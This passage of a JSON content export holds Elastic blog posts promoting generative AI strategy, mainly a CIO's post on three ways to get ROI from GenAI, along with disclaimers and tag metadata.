takeaways from IT leaders","_metadata":{"uid":"cs1e32c57d6dbe12ee"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo compete, grow, and innovate, organizations need a solid data foundation to accelerate the adoption of GenAI technologies. Your data and GenAI strategy should empower your customers and employees to make informed, data-driven decisions confidently.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLearn what other IT leaders have had to say about their data and AI strategies\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfcf950764c1273b3"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd1686a36a9234b2f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs76d0228983d2b772"}}}],"publish_date":"2024-10-09","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Unlock business growth with data-driven insights: 5 lessons from IT leaders","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt9fb9f67ee7bb5c15","ACL":{},"created_at":"2023-11-06T20:50:46.256Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"real-time-analysis","label_l10n":"Real-time analysis","tags":[],"title":"Real-time analysis","updated_at":"2023-11-06T20:50:46.256Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:43.334Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt2b0f2e0f79bee06a","_version":1,"title":"161778 - 2 Blog header images IT Wrapped Report blogs D2 copy_Option 5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-09T13:52:26.075Z","updated_at":"2024-10-09T13:52:26.075Z","content_type":"image/png","file_size":"202006","filename":"161778_-_2_Blog_header_images_IT_Wrapped_Report_blogs_D2_copy_Option_5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-10-09T16:30:40.711Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2b0f2e0f79bee06a/67068a9af2fbee375fe60337/161778_-_2_Blog_header_images_IT_Wrapped_Report_blogs_D2_copy_Option_5.png"},"title":"Unlock business growth with data-driven insights: 5 lessons from IT leaders","title_l10n":"Unlock business growth with data-driven insights: 5 lessons from IT leaders","updated_at":"2025-02-06T02:51:04.449Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/unlock-business-growth-data-driven-insights","publish_details":{"time":"2025-02-06T02:51:10.301Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt5a0c23382fc05857","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"Generative AI has already delivered efficiency gains and promises impressive use cases, but IT leaders need it to deliver sustainable value. Discover three ways Elastic’s CIO integrates GenAI strategy into our overall business strategy to drive ROI.","author":["blt91aefbbce7bce7d9"],"category":["bltc17514bfdbc519df"],"created_at":"2024-10-11T02:44:32.654Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf189d17f7e0157b9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs a CIO, I’m constantly seeking ways to balance cost efficiency with transformative technology. Generative AI (GenAI) promises \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/15-generative-ai-use-cases-enterprise\"\u003e\u003cspan style='font-size: 12pt;'\u003eimpressive use cases\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, but as the owner of Elastic’s data, information, and technology risk, I need to ensure it delivers real, measurable value to my organization that is sustainable. We’re moving beyond the hype and ensuring our generative AI strategy is not only integrated into the fabric of our business, but drives measurable ROI.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSo, how do you do that? To start, you’ll need to shift your perspective of generative AI. It’s not just a one-and-done project, but rather a fundamental part of your business strategy. You’ll want to go from one-off generative AI projects to having a holistic generative AI strategy that produces sustainable business impact. This takes shape in multiple ways across your business.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1af36aa1838b2fea"}}},{"image":{"image":{"uid":"bltaec06456cfc0e460","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-10-11T02:39:54.350Z","created_by":"bltb6c155cd84fc0c1a","file_size":"149130","filename":"Gartner_blog_post-720x420-ok.png","parent_uid":null,"tags":[],"title":"Gartner blog post-720x420-ok.png","updated_at":"2024-10-11T02:39:54.350Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-10-14T14:00:00.577Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaec06456cfc0e460/67088ffa3104e8e6cf90f209/Gartner_blog_post-720x420-ok.png"},"_metadata":{"uid":"cs3723f9aa65a98511"},"caption_l10n":"","alt_text_l10n":"Ways to maximize the ROI on your generative AI strategy","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"1. Integrate GenAI across your business strategy","_metadata":{"uid":"cs92275dec7b46cdc6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEvery single company should be exploring and putting \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/generative-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003egenerative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ein its products and services. Whether you’re a telecommunications provider using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/understanding-ai-customer-support\"\u003e\u003cspan style='font-size: 12pt;'\u003egenerative AI to enhance customer support experiences\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eor a retailer using generative AI to help your customers find products faster, you should be exploring ways that it can help your business and your customers. However, as you do this, you will need to ensure that what you do is not only differentiated but is accurate, is consistent, scales, performs, and is measurable. This means choosing the right tools to build into this fabric are just as critical as the experiences they will provide. How are you going to operate and maintain them? What are other factors you should think about?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt Elastic, ensuring that any products or services we offer are generative AI-enabled is crucial. This isn’t just about adding generative AI and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/natural-language-processing\"\u003e\u003cspan style='font-size: 12pt;'\u003enatural language processing (NLP)\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003efeatures — it’s about rethinking how we deliver value to our customers and staying ahead of the competition. We happen to have a great foundation for generative AI —\u003c/span\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/platform\"\u003e\u003cspan style='font-size: 12pt;'\u003eour Search AI technology\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e— which is a common fabric upon which we build \u003c/span\u003e\u003ca href=\"https://www.elastic.co/generative-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003egenerative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003einto our different products and solutions.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor example, we have not only put the\u003c/span\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/ai-assistant\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003einto our Observability solution, we also have it in our Security solution, and soon it will be available in our Search solution. We’re able to do this because they share the same underlying platform. And moreover, it’s not just AI assistants — we’re also reimagining the users’ workflow and using generative AI in the background to completely change what the user experiences. For instance, we’re reimagining a security analyst’s experience through\u003c/span\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/ai-driven-security-analytics\"\u003e\u003cspan style='font-size: 12pt;'\u003eAttack Discovery\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, which again, is built on top of our common Search AI Platform. You can think of putting GenAI in your products and services as the numerator in our equation — a driver for top-line growth.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"2. Maximize productivity and efficiency with GenAI ","_metadata":{"uid":"csc212256fead1e476"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenerative AI also allows us to drive efficiency, extend our reach, and simplify operations across the organization when we use the right data. This isn’t just cost-saving — it enables our teams to do more and improves overall productivity. For example, my team, among other teams at my company, is putting generative AI models and our proprietary data to work. From augmenting sales teams with a SalesGPT to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/genai-customer-support-building-proof-of-concept\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003estreamlining customer support\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to helping write marketing emails and more, we’re continuing to \u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\" target=\"_self\"\u003ehone our strategy and our use cases\u003c/a\u003e to help our teams now and create a competitive advantage. Cisco has done something similar by using our Search AI technology to help its support engineers search for similar cases in real time to solve customers’ problems. The new search capabilities have enabled \u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/cisco\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCisco to save 5,000 hours\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(65, 65, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eper month of support engineer time.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBut these internal use cases should not be viewed as independent projects. It’s easy for individual teams and departments to dive head first into generative AI projects, buy things off the shelf, and build their own solution, but the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/tool-consolidation#:~:text=Tool%20sprawl%20refers%20to%20the%20creeping%20expansion%20of%20monitoring%20tools%20within%20an%20organization.%20It%20can%20be%20problematic%20because%20it%20leads%20to%20a%20technology%20environment%20with%20data%20silos%20making%20it%20hard%20to%20identify%20and%20troubleshoot%20issues.\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003etech sprawl\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(65, 65, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewill quickly grow out of control. Again, you need to think about the fundamentals: Start with identifying the data you want to use, find the commonality between all these different use cases, and come up with a plan that could scale and be sustainable to operate and maintain.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBy adopting generative AI to automate routine tasks, generate insights, and support our teams in real time, we’ve been able to unlock significant productivity gains and reduce operational costs, ultimately boosting the ROI on our generative AI initiative. And at this stage, it’s hard to even call it a “generative AI initiative.” It’s really part of the foundation of our business strategy. It’s completely embedded into everything we do. This phase of optimization is the denominator in our equation — enabling us to reduce costs while enhancing output.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs986c32cb57d0c965"}}},{"banner":{"reference":[{"uid":"blt8389a9fc0b484850","_content_type_uid":"banner"}],"_metadata":{"uid":"cs14b1d48d685cfeaf"}}},{"title_text":{"title_text":[{"title_l10n":"3. Make data-backed, informed decisions with GenAI","_metadata":{"uid":"cse6fc83fc8b22e527"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the near future, I believe generative AI will empower us to make better, faster, and more informed decisions that impact critical business outcomes. You can think of this as the multiplier effect that can truly take your organization to the next level by making every decision count. In this step, we focus on what to buy, build, sell, and invest in.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor instance, your company might employ generative AI models to rapidly generate and analyze different product concepts based on customer preferences, market trends, and competitor data. This would allow your business to quickly decide which product to build and allocate resources to. You’d save time on manual analysis while ensuring that each decision is backed by data-driven, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-turn-data-into-actionable-insights\"\u003e\u003cspan style='font-size: 12pt;'\u003eactionable insights\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAnother example, imagine you’re contemplating buying another company. With a generative AI model that is fed your proprietary data including financial information, company goals, and external market conditions, you can ask the generative AI model if buying the company is the right investment at this time. With the power of your proprietary data, your model will have the data it needs to propose a data-backed, informed decision. By leveraging generative AI in this way, your company can reduce risks, prioritize high-impact projects, and accelerate time-to-market, ultimately boosting ROI.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn order to do this, you need to make sure you have the right data to feed your\u003c/span\u003e\u003cspan style='color:rgb(65, 65, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/large-language-models\"\u003e\u003cspan style='font-size: 12pt;'\u003elarge language models (LLMs)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and the right technology to facilitate this. At Elastic, we combine the precision that search technology brings to the table with the intelligence of AI to facilitate \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style='font-size: 12pt;'\u003eretrieving\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e the data that is best fit for the job to the LLM.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What to avoid to maximize ROI on your generative AI strategy","_metadata":{"uid":"csf7fbdf8c5354a55d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo ensure a strong ROI from your generative AI initiative, avoid jumping into implementation without a clear business problem or objective. Many businesses make the mistake of treating generative AI as a trend rather than a tool with specific use cases that can span your entire organization. Avoid looking at your generative AI project as a one-and-done.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you create a messy ecosystem of one-off apps, everything will be decentralized. And when it comes to compliance, you will struggle. Laws about generative AI are coming. If you can’t tell your customers how generative AI touches their experience, you’re going to be paying hefty fines and/or a lot of money to untangle your web.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"How to get started with GenAI","_metadata":{"uid":"cs4424dc860989e78e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRemember, these aren’t separate efforts — they all come together to form one unified approach. Success in AI requires that these pillars work in harmony, reinforcing each other to deliver sustainable impact. With the goal to just get pilots off the ground, you’ll be left with many independent projects and programs. True success is when everything is working together.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo optimize generative AI applications for real-world scenarios and growth, we should focus our efforts on the fundamentals — data. Because if you think about it, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/explore/succeed-with-the-power-of-elastic/strategic-guide-to-putting-your-data-to-work\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecentral to all generative AI projects is data\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(65, 65, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e— bringing it together and making it accessible when and where it’s needed. Having a solid data strategy is essential. Without unified and accessible data, even the most advanced generative AI initiatives will struggle to deliver real value. At the end of the day, data accessibility is the key to turning generative AI initiatives into sustainable impact.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAt Elastic, we’re here to help you bring your generative AI initiative from pilot to sustainable business impact.\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.elastic.co/portfolio/operationalizing-generative-ai-strategic-guide\"\u003e\u003cspan style='font-size: 12pt;'\u003eDownload the ebook to get started\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5b632ba4be6822da"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9af0c2c9135e56b5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb992be1dcf61644f"}}}],"publish_date":"2024-10-14","sanity_migration_complete":false,"seo":{"seo_title_l10n":"3 ways to maximize the ROI on your generative AI strategy","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"title":"Customer experience","label_l10n":"Customer experience","keyword":"customer-experience","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt25722919b3bca233","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T22:34:27.803Z","updated_at":"2021-12-16T22:34:27.803Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:15:55.021Z","user":"blt3044324473ef223b70bc674c"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","title":"Natural Language Processing (NLP)","label_l10n":"Natural Language Processing (NLP)","keyword":"natural-language-processing","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt97696fc6e9921c30","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:43:16.119Z","updated_at":"2023-11-06T20:43:16.119Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:23:24.704Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt725ea60213cae5c5","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-10-11T02:36:19.358Z","created_by":"bltb6c155cd84fc0c1a","file_size":"24382","filename":"144760---2nd-Batch-of-10-GAI-blog-header-images_04.jpg","parent_uid":null,"tags":[],"title":"144760---2nd-Batch-of-10-GAI-blog-header-images_04.jpg","updated_at":"2024-10-11T02:36:19.358Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-10-14T14:00:00.597Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt725ea60213cae5c5/67088f238676eef4436f59d9/144760---2nd-Batch-of-10-GAI-blog-header-images_04.jpg"},"title":"3 ways to maximize the ROI on your generative AI strategy","title_l10n":"3 ways to maximize the ROI on your generative AI strategy","updated_at":"2025-02-06T02:48:32.259Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/maximize-roi-generative-ai-strategy","publish_details":{"time":"2025-02-06T02:48:50.895Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt172264fcf45db151","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"Generative AI is all the buzz, but what’s actually possible with this emerging technology? We’ll dive into 15 generative AI use cases to show what’s possible today — and provide inspiration to get you started with your own generative AI use cases.","author":["blt2914a3798eec2d59"],"category":["bltc17514bfdbc519df"],"created_at":"2024-06-24T01:51:36.498Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs62ce1898ad8c29c0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003eThere’s a lot of chatter about \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/generative-ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003egenerative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e and what it can (and can’t) do. Generative AI, such as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/large-language-models\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003elarge language models (LLMs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e), creates original content by utilizing the patterns and structures it learned from extensive training data without storing the data itself. That includes creating things like text, software code, and art. While it can create content, it won’t be \u003ca href=\"https://www.fastcompany.com/91140608/the-next-phase-of-generative-ai-presents-a-golden-opportunity-for-businesses\" target=\"_blank\"\u003ereplacing humans\u003c/a\u003e any time soon.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003eStill, it is reshaping the landscape of industries worldwide from enhancing cybersecurity defenses to personalizing customer experiences. In fact, 99% of surveyed organizations say that \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pdf/platform/global-generative-ai-adoption-study.pdf\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003egenerative AI has the potential to drive change\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e in their organization.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLet's delve into ways \u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\" target=\"_self\"\u003egenerative AI unlocks new possibilities\u003c/a\u003e and transforms everyday business operations by assisting the humans who use it.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cimg alt=\"15 generative AI use cases for the enterprise\" 